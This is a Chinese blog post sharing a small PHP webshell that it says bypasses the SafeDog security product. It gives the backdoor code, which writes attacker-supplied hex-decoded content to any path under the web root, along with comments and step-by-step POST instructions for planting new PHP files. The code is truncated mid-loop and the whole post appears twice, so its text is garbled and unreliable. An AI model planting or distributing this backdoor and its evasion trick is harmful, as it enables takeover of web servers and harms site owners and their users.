分享PHP小马一枚,完美绕过安全狗检测。
2016-01-23 17:49
483 查看
没做免杀之前,被狗咬死:
直接上代码:
$p=realpath(dirname(__FILE__)."/../").$_POST["a"];
$t=$_POST["b"];
$tt="";
for ($i=0;$i @fwrite(fopen($p,"w"),$tt);
echo "success!";
?>
代码分析:
$p=realpath(dirname(__FILE__)."/../").$_POST["a"]; //定义$p为根目录的物理路径+$_POST["a"]的内容
$t=$_POST["b"]; //定义$t为$_POST["b"]的内容
$tt=""; //定义$tt为空
for ($i=0;$i
@fwrite(fopen($p,"w"),$tt); //写入文件地址是$p,内容是$tt
echo "success!";
?>
利用方法:
将写入的内容用url编码,比如,编码后为:%3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%3F%3E。去掉其中的%,得到:3C3F70687020706870696E666F28293B3F3E。
然后访问后门,将POST内容改为:a=/111.php&b=3C3F70687020706870696E666F28293B3F3E,即可写入内容。
成功过狗:
直接上代码:
$p=realpath(dirname(__FILE__)."/../").$_POST["a"];
$t=$_POST["b"];
$tt="";
for ($i=0;$i @fwrite(fopen($p,"w"),$tt);
echo "success!";
?>
代码分析:
$p=realpath(dirname(__FILE__)."/../").$_POST["a"]; //定义$p为根目录的物理路径+$_POST["a"]的内容
$t=$_POST["b"]; //定义$t为$_POST["b"]的内容
$tt=""; //定义$tt为空
for ($i=0;$i
@fwrite(fopen($p,"w"),$tt); //写入文件地址是$p,内容是$tt
echo "success!";
?>
利用方法:
将写入的内容用url编码,比如,编码后为:%3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%3F%3E。去掉其中的%,得到:3C3F70687020706870696E666F28293B3F3E。
然后访问后门,将POST内容改为:a=/111.php&b=3C3F70687020706870696E666F28293B3F3E,即可写入内容。
成功过狗:
相关文章推荐
- PHP_GET后门,躲避任何安全软件
- Thinkphp 漏洞小试
- PHP_GET后门,躲避任何安全软件
- Thinkphp 漏洞小试
- php截取后台登陆密码的代码
- php截取后台登陆密码的代码
- ThinkPHP最新版本SQL注入漏洞
- ThinkPHP最新版本SQL注入漏洞
- 重大漏洞!PHP multipart/form-data头部解析远程拒绝服务漏洞
- 重大漏洞!PHP multipart/form-data头部解析远程拒绝服务漏洞
- Matplotib tutorial(2)
- phpcms某处储存型XSS(demo+本地演示)
- phpcms某处储存型XSS(demo+本地演示)
- ThinkPHP的静态缓存,非系统写法。
- VC FTP服务器程序分析(三)
- PHP JSON取数据
- iis7运行php时出现FastCGI进程意外退出的解决方案
- PHP中常见的五种设计模式
- Zend studio13 导入已有php文件夹
- Windows客户端访问vsftpd服务器中文乱码问题解决